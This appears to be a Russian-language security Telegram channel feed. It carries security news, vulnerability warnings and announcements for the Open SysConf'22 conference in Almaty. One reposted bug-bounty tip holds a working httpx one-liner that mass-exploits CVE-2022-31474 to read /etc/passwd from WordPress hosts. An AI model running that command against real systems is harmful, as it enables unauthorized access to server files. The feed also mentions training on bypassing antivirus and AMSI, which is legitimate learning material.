Пишут, что заразили 35к репозиториев. Вредоносный код крадет все конфиги и выполняет произвольные команды.
Рекомендую поискать в коде (включая все библиотеки, в т.ч. node_modules и т.д.) домен
Если он есть, откатывайтесь, меняйте все пароли и ключи.
Источник:
https://mobile.twitter.com/stephenlacy/status/1554697077430505473
#infected
Рекомендую поискать в коде (включая все библиотеки, в т.ч. node_modules и т.д.) домен
ovz1.j19544519.pr46m.vps.myjino.ru
Если он есть, откатывайтесь, меняйте все пароли и ключи.
Источник:
https://mobile.twitter.com/stephenlacy/status/1554697077430505473
#infected
👍6
Forwarded from Sys-Admin InfoSec
Open SysConf 2022 Уже в Октябре!
Привет, мы готовим новую - четвертую ежегодную встречу Open SysConf'22.
Уже точно есть:
— Три доклада
— Собрано половина бюджета
— Место, дата и время встречи
- Обновленный сайт sysconf.io
Обычно у большинства людей обстоятельства складываются таким образом, что вечно что-то мешает заняться спортом, сделать доклад, поучаствовать в конфе, мешают обычно работа, откладывание за завтра и тп и тд...
Собраться, поделиться знаниями, найти время для себя - это то, что нужно действительно сделать здесь и сейчас (и в Октябре)! Расправь плечи дорогой друг, подними голову и ступай смело вперед:
- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы.
Зал большой, места хватит всем! Все нужные ссылки, ты найдешь на сайте. Peace ✌️.
Привет, мы готовим новую - четвертую ежегодную встречу Open SysConf'22.
Уже точно есть:
— Три доклада
— Собрано половина бюджета
— Место, дата и время встречи
- Обновленный сайт sysconf.io
Обычно у большинства людей обстоятельства складываются таким образом, что вечно что-то мешает заняться спортом, сделать доклад, поучаствовать в конфе, мешают обычно работа, откладывание за завтра и тп и тд...
Собраться, поделиться знаниями, найти время для себя - это то, что нужно действительно сделать здесь и сейчас (и в Октябре)! Расправь плечи дорогой друг, подними голову и ступай смело вперед:
- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы.
Зал большой, места хватит всем! Все нужные ссылки, ты найдешь на сайте. Peace ✌️.
👍3
Список всех (известных) зиродеев, которые были активно использованы хакерами с 2014 года:
https://docs.google.com/spreadsheets/u/0/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/htmlview
Так, например, за последние два дня было пропатчено 3 зиродея:
* CVE-2022-2856 позволяющий выполнить код в Google Chrome
* CVE-2022-32893 позволяющий выполнить код в Safari
* CVE-2022-32894 позволяющий выполнить код в iOS/macOS kernel
Обновляемся, если еще не успели.
Источник: @ckuRED
#zeroday
https://docs.google.com/spreadsheets/u/0/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/htmlview
Так, например, за последние два дня было пропатчено 3 зиродея:
* CVE-2022-2856 позволяющий выполнить код в Google Chrome
* CVE-2022-32893 позволяющий выполнить код в Safari
* CVE-2022-32894 позволяющий выполнить код в iOS/macOS kernel
Обновляемся, если еще не успели.
Источник: @ckuRED
#zeroday
👍4
Обнаружил SSRF-уязвимость в плагине Tumbler для XFCE, которая работает по умолчанию. Если кратко, суть в том, что при открытии директории с m3u8-файлом с расширением .mp4 (работает и для .mp3, .avi, .mpg, etc.) можно отправлять любой GET-запрос на любой сервер.
Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.
Патч и исправленная версия уже выпущены.
Подробности на моем блоге:
https://murat.one/?p=187
#ssrf #xfce #kali #debian
Работает в последней версии Kali Linux, Debian XFCE, и скорее всего в любом другом дистрибутиве Linux с XFCE на борту. Но большую опасность, наверное, несет для Kali Linux, пользователи которого локально тестируют уязвимые приложения типа DVWA, и одного запроса может хватить для компрометации компьютера.
Патч и исправленная версия уже выпущены.
Подробности на моем блоге:
https://murat.one/?p=187
#ssrf #xfce #kali #debian
👍9🔥1
Forwarded from Sys-Admin InfoSec
Open SysConf 2022 - Updates: Анонс доклада
Привет, последний день лета не означает, что все летнее, праздничное - уходит до следующего года, скоро наступит 14 Октября и мы снова окунемся в теплую и дружественную обстановку Open SysConf'22.
Готовы стикеры, пару подарков и конечно несколько тем докладов, один из которых хочу презентовать вам:
— Автор: @novitoll - автор deep dive ресерчей, патчер ядра Linux и конечно же автор множества различных статей и докладов, имеет свой канал https://t.me/novitoll_ch и всегда старается шарить полезную инфу людям, в том числе и на Open SysConf'ах
— Доклад: Практический опыт с 4G, 5G
— Кратко о докладе: Кодим Rx, Tx функционалы на С, описывая теорию (OFDM/SC-OFDM демодуляция, логические и транспорт каналы 4G, 5G) и подводные камни при имплементации. Анализируем трафик.)
Скажу от себя, все технические детали, а их будет очень много будут представлены в доступном и демонстрируемом виде.
В общем дорогой друг, не теряйся:
- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы
- И просто для галочки, не в службу, а в дружбу, как посетитель зачекинься в этой форме.
Всем добра. Peace ✌️.
Привет, последний день лета не означает, что все летнее, праздничное - уходит до следующего года, скоро наступит 14 Октября и мы снова окунемся в теплую и дружественную обстановку Open SysConf'22.
Готовы стикеры, пару подарков и конечно несколько тем докладов, один из которых хочу презентовать вам:
— Автор: @novitoll - автор deep dive ресерчей, патчер ядра Linux и конечно же автор множества различных статей и докладов, имеет свой канал https://t.me/novitoll_ch и всегда старается шарить полезную инфу людям, в том числе и на Open SysConf'ах
— Доклад: Практический опыт с 4G, 5G
— Кратко о докладе: Кодим Rx, Tx функционалы на С, описывая теорию (OFDM/SC-OFDM демодуляция, логические и транспорт каналы 4G, 5G) и подводные камни при имплементации. Анализируем трафик.)
Скажу от себя, все технические детали, а их будет очень много будут представлены в доступном и демонстрируемом виде.
В общем дорогой друг, не теряйся:
- https://sysconf.io
- 14 Октября, с 11:00 до 20:00, Алматы
- И просто для галочки, не в службу, а в дружбу, как посетитель зачекинься в этой форме.
Всем добра. Peace ✌️.
👍3❤1🔥1
Forwarded from Devious Methods
В TryHackMe появился модуль Host Evasions!
This module provides the essential knowledge and fundamental techniques to bypass various host-based security solutions, including AV products, UAC and AppLocker, Logging, Runtime Detection, and AMSI. You will also learn the Living-Off-the-Land technique and how to leverage the Windows Sysinternals tool to perform various Red Team purposes
https://tryhackme.com/module/host-evasions
This module provides the essential knowledge and fundamental techniques to bypass various host-based security solutions, including AV products, UAC and AppLocker, Logging, Runtime Detection, and AMSI. You will also learn the Living-Off-the-Land technique and how to leverage the Windows Sysinternals tool to perform various Red Team purposes
https://tryhackme.com/module/host-evasions
TryHackMe
Host Evasions
Understand the techniques behind host-based security and bypass the most common security products in Windows operating systems.
🔥5
Ожидается интересный доклад про нейромаркетинг от Евгения Гончарова, приходите :)
Forwarded from Sys-Admin InfoSec
Hey all, tmrw I will speak at the KazHackStan conference with my presentation with subject:
* Open-Source Projects Responsibility Awareness (by Open BLD Example)
All details you can see on KazHackStan.kz, let's burn 🔥 tomorrow, who will be in Almaty let's get acquainted and let's talk, try to share knowledge with each other 🤘
* Open-Source Projects Responsibility Awareness (by Open BLD Example)
All details you can see on KazHackStan.kz, let's burn 🔥 tomorrow, who will be in Almaty let's get acquainted and let's talk, try to share knowledge with each other 🤘
🔥3❤1
Forwarded from BugXplorer
CVE-2022-31474#bugbountytips
https://twitter.com/shaybt12/status/1569794789175967745
cat hosts |httpx -title -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-
id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"
👍3
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - SSRF-уязвимости / Старый... Но не бесполезный IRC
Привет, мы идем вперед согласно своей правде и намерениям обнаруживая уязвимости и сигнализируя алертами об аномалиях в наших (и не только) системах.
Детали двух новых докладов на 14 Октября
История одного CVE
- Автор: @manfromkz. Senior Security Testing Engineer | OSCP | eWPTXv2 | eCPTXv2 | Master of Computer Sciencer
- Краткое описание: Рассказ о том, как простой пентест веб-приложения привел к выявлению SSRF-уязвимости в популярном менеджере рабочего стола для Linux.
Старый... Но не бесполезный
- Автор: @t2micro. DevOps
- Краткое описание: Применение протокола IRC в современной инфраструктуре для построения сервис-ориентированной модели алертинга.
От себя: Мурат и Ильяс мои хорошие друзья и экстра-профессионалы своего дела. Детали вышеприведенных докладов, которые будут представлены на Open SysConf'22 - это уникальный материал от первого лица, возможность не только послушать, но и задать вопросы, пообщаться в неформальной обстановке, обменяться опытом и знаниями простым и понятным форматом.
Перед зимней спячкой ув <username> обязательно приходи 14 Октября в SmartPoint г.Алматы, трансляции не будет, но будет возможность пообщаться в живую. Детали здесь - sysconf.io
Peace ✌️
Привет, мы идем вперед согласно своей правде и намерениям обнаруживая уязвимости и сигнализируя алертами об аномалиях в наших (и не только) системах.
Детали двух новых докладов на 14 Октября
История одного CVE
- Автор: @manfromkz. Senior Security Testing Engineer | OSCP | eWPTXv2 | eCPTXv2 | Master of Computer Sciencer
- Краткое описание: Рассказ о том, как простой пентест веб-приложения привел к выявлению SSRF-уязвимости в популярном менеджере рабочего стола для Linux.
Старый... Но не бесполезный
- Автор: @t2micro. DevOps
- Краткое описание: Применение протокола IRC в современной инфраструктуре для построения сервис-ориентированной модели алертинга.
От себя: Мурат и Ильяс мои хорошие друзья и экстра-профессионалы своего дела. Детали вышеприведенных докладов, которые будут представлены на Open SysConf'22 - это уникальный материал от первого лица, возможность не только послушать, но и задать вопросы, пообщаться в неформальной обстановке, обменяться опытом и знаниями простым и понятным форматом.
Перед зимней спячкой ув <username> обязательно приходи 14 Октября в SmartPoint г.Алматы, трансляции не будет, но будет возможность пообщаться в живую. Детали здесь - sysconf.io
Peace ✌️
👍4❤1
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Сети, Ansible шаблонизация и не только
До нашей встречи на Open SysConf в г.Алматы осталось практически 10 дней и я рад презентовать Вам финальные темы докладов:
Сети (хуети) в современном датацентре
- Автор: Айдар Оспанбеков. Архитектор облака PS.kz.
- Краткое описание: С какими проблемами мы столкнулись при эксплуатации сети в публичном облаке; Как и для чего мы отказывались от VLAN в пользу VxLAN; Как строили сеть по топологии spine-leaf с BGP и FRRouting
Шаблонизация Linux систем в организациях
- Автор: Нурбиби "R0b0Cat". Системный администратор.
- Краткое описание: Доклад для тех кому нужно произвести в единый формат linux дистрибутивы в организации
Неявный превентинг констракшн
- Автор: Yevgeniy "sysadminkz". Sys-Adm.in
- Краткое описание: Неявный превентинг - такого термина в интернете не нашел, поэтому расскажу о том, как я вижу defencive подход с позиции неявной превентивной защиты. Создадим новый термин и его понимание прямо в реалтайме ✌️
Голова чтобы думать, ноги чтобы ходить - приходи на Open SysConf 14 октября в SmartPoint, г.Алматы.
Детали на сайте: https://sysconf.io
До нашей встречи на Open SysConf в г.Алматы осталось практически 10 дней и я рад презентовать Вам финальные темы докладов:
Сети (хуети) в современном датацентре
- Автор: Айдар Оспанбеков. Архитектор облака PS.kz.
- Краткое описание: С какими проблемами мы столкнулись при эксплуатации сети в публичном облаке; Как и для чего мы отказывались от VLAN в пользу VxLAN; Как строили сеть по топологии spine-leaf с BGP и FRRouting
Шаблонизация Linux систем в организациях
- Автор: Нурбиби "R0b0Cat". Системный администратор.
- Краткое описание: Доклад для тех кому нужно произвести в единый формат linux дистрибутивы в организации
Неявный превентинг констракшн
- Автор: Yevgeniy "sysadminkz". Sys-Adm.in
- Краткое описание: Неявный превентинг - такого термина в интернете не нашел, поэтому расскажу о том, как я вижу defencive подход с позиции неявной превентивной защиты. Создадим новый термин и его понимание прямо в реалтайме ✌️
Голова чтобы думать, ноги чтобы ходить - приходи на Open SysConf 14 октября в SmartPoint, г.Алматы.
Детали на сайте: https://sysconf.io
👍1
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Анонс всех докладов на завтра (14 Октября)
До дня Х осталось меньше суток, завтра по плану будет:
— 11:00 - Вступительное слово
— 11:15 - Сабыржан "novitoll" Тасболатов: Практический опыт с 4G, 5G
— 12:15 - Нурбиби "R0b0Cat": Шаблонизация Linux систем в организациях
— 13:00 - Обед
— 14:00 - Дмитрий "ватман": CDC
— 14:50 - Kutlymurat "manfromkz" Mambetniyazov: История одного CVE
— 15:20 - Roman "sysroman": Ansible AWX by Oracle
— 15:45 - кофе-брейк
— 16:00 - Shelldon "Sh3lldon": DEP vs ROP
— 16:50 - Ilyas B Arinov "t2micro": Старый... Но не бесполезный IRC
— 17:20 - Айдар Оспанбеков: Сети (хуети) в современном датацентре
— 18:05 - Yevgeniy "sysadminkz": Неявный превентинг констракшн
План может меняться, уже не обессудьте. Заряжаем себя и друзей, находим силы и возможности и проводим нашу встречу в добром здравии и отношении.
☀️ Завтра встречаем Вас на первом этаже - ул. Байзакова 280 в SmartPoint, г.Алматы
⚡️ Кто не зарегистрировался, зарегистрируйтесь пожалуйста иначе мест Вам может не хватить, детали здесь: https://sysconf.io
Всем Peace ✌️
До дня Х осталось меньше суток, завтра по плану будет:
— 11:00 - Вступительное слово
— 11:15 - Сабыржан "novitoll" Тасболатов: Практический опыт с 4G, 5G
— 12:15 - Нурбиби "R0b0Cat": Шаблонизация Linux систем в организациях
— 13:00 - Обед
— 14:00 - Дмитрий "ватман": CDC
— 14:50 - Kutlymurat "manfromkz" Mambetniyazov: История одного CVE
— 15:20 - Roman "sysroman": Ansible AWX by Oracle
— 15:45 - кофе-брейк
— 16:00 - Shelldon "Sh3lldon": DEP vs ROP
— 16:50 - Ilyas B Arinov "t2micro": Старый... Но не бесполезный IRC
— 17:20 - Айдар Оспанбеков: Сети (хуети) в современном датацентре
— 18:05 - Yevgeniy "sysadminkz": Неявный превентинг констракшн
План может меняться, уже не обессудьте. Заряжаем себя и друзей, находим силы и возможности и проводим нашу встречу в добром здравии и отношении.
☀️ Завтра встречаем Вас на первом этаже - ул. Байзакова 280 в SmartPoint, г.Алматы
⚡️ Кто не зарегистрировался, зарегистрируйтесь пожалуйста иначе мест Вам может не хватить, детали здесь: https://sysconf.io
Всем Peace ✌️
👍4🔥2
История_одного_CVE_@manfromkz_Open_SysConf'22.pdf
1.5 MB
Мой доклад на тему "История одного CVE или как взломать хакера на Kali Linux" на Open Sysconf'22.
Запись доклада выложу позже.
Запись доклада выложу позже.
👍15🔥3
Forwarded from b4tr
Всем у кого не стоит двухфакторка в телеге посвящается. Сейчас идут массовые взломы пользователей телегам через различного рода ботов у которых один и тот же функционал. В общем, Вам приходит сообщение с рекламой некоего бота, этот бот просит пройти верификацию, после того как вы отправили боту свой номер телефона, вам приходит сообщение с кодом, и бот просит вас ввести ему этот код, после чего всем вашим контактам и всем группам где вы состоите приходит то же самое сообщение с рекламой, что позволяет какеру пополнять свою базу сдеаноненных пользователей.
ВЫВОД. Ставьте двухфакторку!
ВЫВОД. Ставьте двухфакторку!
🤡3
One brick to the IT world
История_одного_CVE_@manfromkz_Open_SysConf'22.pdf
А вот и видеозапись доклада "История одного CVE или как взломать хакера на Kali Linux" на Open Sysconf'22:
https://youtu.be/QBolH9bzzIE
https://youtu.be/QBolH9bzzIE
YouTube
05. Open SysConf 2022 - История одного CVE. Kutlymurat "manfromkz" Mambetniyazov
Рассказ о том, как простой пентест веб-приложения привел к выявлению SSRF-уязвимости в популярном менеджере рабочего стола для Linux
🔥10👍5👻1
Forwarded from Sys-Admin InfoSec
Конференция для общения Open SysConf'22 - Видео и Благодарности
Рад презентовать вам полный набор обработанного и нарезанного видео докладов нашей четвертой открытой конференции Open SysConf'22
Благодаря всеобщим действиям, тех кто принимал участие в докладах, техническом сопровождении, организации, помощи и волонтерстве, а так же участников и друзей конференции - мы это сделали в этом году еще раз 🎉
— 01. Open SysConf 2022 - Конференция для общения. Начало
— 02. Open SysConf 2022 - Практический опыт с 4G. Сабыржан "novitoll" Тасболатов
— 03. Open SysConf 2022 - Шаблонизация Linux систем в организациях. Нурбиби "R0b0Cat"
— 04. Open SysConf 2022 - CDC. Дмитрий "ватман"
— 05. Open SysConf 2022 - История одного CVE. Kutlymurat "manfromkz" Mambetniyazov
— 06. Open SysConf 2022 - DEP vs ROP. Shelldon "Sh3lldon"
— 07. Open SysConf 2022 - Сети хуети в современном датацентре. Айдар Оспанбеков
— 08. Open SysConf 2022 - Неявный превентинг констракшн. Yevgeniy "sysadminkz"
В этом году нам так же помогли компании и команды Nitro Team, Core 24/7, PS.kz ✊
Всем спасибо, мира и успехов в Наступающем. Peace ✌️
Рад презентовать вам полный набор обработанного и нарезанного видео докладов нашей четвертой открытой конференции Open SysConf'22
Благодаря всеобщим действиям, тех кто принимал участие в докладах, техническом сопровождении, организации, помощи и волонтерстве, а так же участников и друзей конференции - мы это сделали в этом году еще раз 🎉
— 01. Open SysConf 2022 - Конференция для общения. Начало
— 02. Open SysConf 2022 - Практический опыт с 4G. Сабыржан "novitoll" Тасболатов
— 03. Open SysConf 2022 - Шаблонизация Linux систем в организациях. Нурбиби "R0b0Cat"
— 04. Open SysConf 2022 - CDC. Дмитрий "ватман"
— 05. Open SysConf 2022 - История одного CVE. Kutlymurat "manfromkz" Mambetniyazov
— 06. Open SysConf 2022 - DEP vs ROP. Shelldon "Sh3lldon"
— 07. Open SysConf 2022 - Сети хуети в современном датацентре. Айдар Оспанбеков
— 08. Open SysConf 2022 - Неявный превентинг констракшн. Yevgeniy "sysadminkz"
В этом году нам так же помогли компании и команды Nitro Team, Core 24/7, PS.kz ✊
Всем спасибо, мира и успехов в Наступающем. Peace ✌️
❤1
Инженер информационной безопасности спит в своей постели. Его ноутбук открыт на тумбочке рядом с ним. Внезапно ноутбук начинает издавать странные звуки, и экран начинает мерцать.
Инженер просыпается в панике и смотрит на экран ноутбука. На нем сообщение: «You have been hacked».
Инженер отчаянно пытается отследить хакера, но сообщение исчезает, а ноутбук выключается. Внезапно инженер слышит громкий стук в дверь.
Он идет открывать дверь, но обнаруживает в коридоре угрожающую фигуру в черном капюшоне. Фигура медленно приближается к нему, и он в страхе отступает.
Фигура начинает говорить, ее голос искажен и угрожающ. Он говорит инженеру, что он станет его жертвой, и что он будет преследовать его и его данные столько, сколько захочет.
Инженер в ужасе, но он набирается мужества, чтобы дать отпор. Он хватает ближайший ноутбук и начинает лихорадочно набирать код. Он знает, что если сможет выяснить личность хакера, то сможет защитить себя и свои данные от этой фигуры.
Конец.
————-
Нет, я не стал писателем историй ужасов, за меня это сделал OpenAI ChatGPT (о котором пока не написал только ленивый). Это искусственный интеллект (ИИ), способный писать за вас текст, код или нарисовать что-нибудь по вашему описанию. В моей памяти это пока единственный случай, когда ИИ не просто цепочка if-else, а действительно нейросеть способный к осмысленному диалогу.
В случае с текстом выше, я задал ему такой запрос "Write a script for a horror movie based on the nightmares of an information security engineer".
Ссылка :
https://beta.openai.com/playground
P.S. В сети ИИ уже заставили написать план по уничтожению человечества, выполнять Linux-команды и т.д.
#openai
@onebrick
@onebrick
@onebrick
Инженер просыпается в панике и смотрит на экран ноутбука. На нем сообщение: «You have been hacked».
Инженер отчаянно пытается отследить хакера, но сообщение исчезает, а ноутбук выключается. Внезапно инженер слышит громкий стук в дверь.
Он идет открывать дверь, но обнаруживает в коридоре угрожающую фигуру в черном капюшоне. Фигура медленно приближается к нему, и он в страхе отступает.
Фигура начинает говорить, ее голос искажен и угрожающ. Он говорит инженеру, что он станет его жертвой, и что он будет преследовать его и его данные столько, сколько захочет.
Инженер в ужасе, но он набирается мужества, чтобы дать отпор. Он хватает ближайший ноутбук и начинает лихорадочно набирать код. Он знает, что если сможет выяснить личность хакера, то сможет защитить себя и свои данные от этой фигуры.
Конец.
————-
Нет, я не стал писателем историй ужасов, за меня это сделал OpenAI ChatGPT (о котором пока не написал только ленивый). Это искусственный интеллект (ИИ), способный писать за вас текст, код или нарисовать что-нибудь по вашему описанию. В моей памяти это пока единственный случай, когда ИИ не просто цепочка if-else, а действительно нейросеть способный к осмысленному диалогу.
В случае с текстом выше, я задал ему такой запрос "Write a script for a horror movie based on the nightmares of an information security engineer".
Ссылка :
https://beta.openai.com/playground
P.S. В сети ИИ уже заставили написать план по уничтожению человечества, выполнять Linux-команды и т.д.
#openai
@onebrick
@onebrick
@onebrick
🔥8👍4😁2
Из Яндекса утекли около 40 гигабайт исходных кодов их продуктов (Алиса, Такси и т.д.). В компании говорят, что утекшие данные старые, но мы все прекрасно понимаем, что даже Linux и Windows до сих пор имеют кодовую базу из 90-х.
То есть, сейчас по сути всем желающим стал доступным код на изучение, и в скором времени, в теории, недоброжелатели могут найти уязвимости и украсть еще больше данных.
Что нужно сделать нам:
- поменять пароли везде, если они одинаковые с паролями, которые вы используете в сервисах Яндекса
- поменять платежную карточку на виртуальную карту с ограниченными средствами в сервисах Яндекса (и лучше везде)
- наконец завести левую сим-карту, чтобы использовать их в онлайн-сервисах
Скриншот с репозиториями:
https://t.me/b4tr_ch/107
#яндекс
@onebrick
@onebrick
@onebrick
То есть, сейчас по сути всем желающим стал доступным код на изучение, и в скором времени, в теории, недоброжелатели могут найти уязвимости и украсть еще больше данных.
Что нужно сделать нам:
- поменять пароли везде, если они одинаковые с паролями, которые вы используете в сервисах Яндекса
- поменять платежную карточку на виртуальную карту с ограниченными средствами в сервисах Яндекса (и лучше везде)
- наконец завести левую сим-карту, чтобы использовать их в онлайн-сервисах
Скриншот с репозиториями:
https://t.me/b4tr_ch/107
#яндекс
@onebrick
@onebrick
@onebrick
🔥6
Forwarded from Karina
Всем привет! Мы открыли регистрацию на beetech conf — нашу ежегодную IT-конференцию.
22 апреля, нархоз.
Программа уже на сайте, в этом году у нас в стриме Инжиниринга два крутых спикера по инфобезу.
@manfromkz расскажет про "код глазами хакера", а Сергей Белов прилетит из Сингапура и расскажет про безопасные фичи v3.
Купить билет можно тут: http://beetech.kz/
22 апреля, нархоз.
Программа уже на сайте, в этом году у нас в стриме Инжиниринга два крутых спикера по инфобезу.
@manfromkz расскажет про "код глазами хакера", а Сергей Белов прилетит из Сингапура и расскажет про безопасные фичи v3.
Купить билет можно тут: http://beetech.kz/
🔥3👍1
В Microsoft Excel найдена уязвимость удаленного выполнения кода, идентификатор CVE-2023-24953.
Критичность 7.8 из 10.
Это означает, что в ближайшее время (на самом деле всегда) открывать офисные документы от незнакомых адресатов не стоит.
Источник:
https://twitter.com/TecR0c/status/1656306296931471365
#excel #rce
Критичность 7.8 из 10.
Это означает, что в ближайшее время (на самом деле всегда) открывать офисные документы от незнакомых адресатов не стоит.
Источник:
https://twitter.com/TecR0c/status/1656306296931471365
#excel #rce
Twitter
Discovered a Microsoft Excel Remote Code Execution vulnerability: CVE-2023-24953 🚨 Now patched in MS May Patch Tuesday :->
https://t.co/fJhjOytZpQ
Thanks @msftsecresponse in addressing this vulnerability!
https://t.co/fJhjOytZpQ
Thanks @msftsecresponse in addressing this vulnerability!
🔥4👍1🙏1
Вот и завершился Standoff этого года. Я играл за Codeby. Проверяются последние отчеты, но скорее всего мы останемся на первой позиции.
Интересно, что Codeby единственная интернациональная команда на этой кибербитве, где в составе играли казахстанцы, россияне и украинцы. Что в очередной раз доказывает, что вместе - мы сила :)
#standoff
Интересно, что Codeby единственная интернациональная команда на этой кибербитве, где в составе играли казахстанцы, россияне и украинцы. Что в очередной раз доказывает, что вместе - мы сила :)
#standoff
🔥26👍5❤2🕊1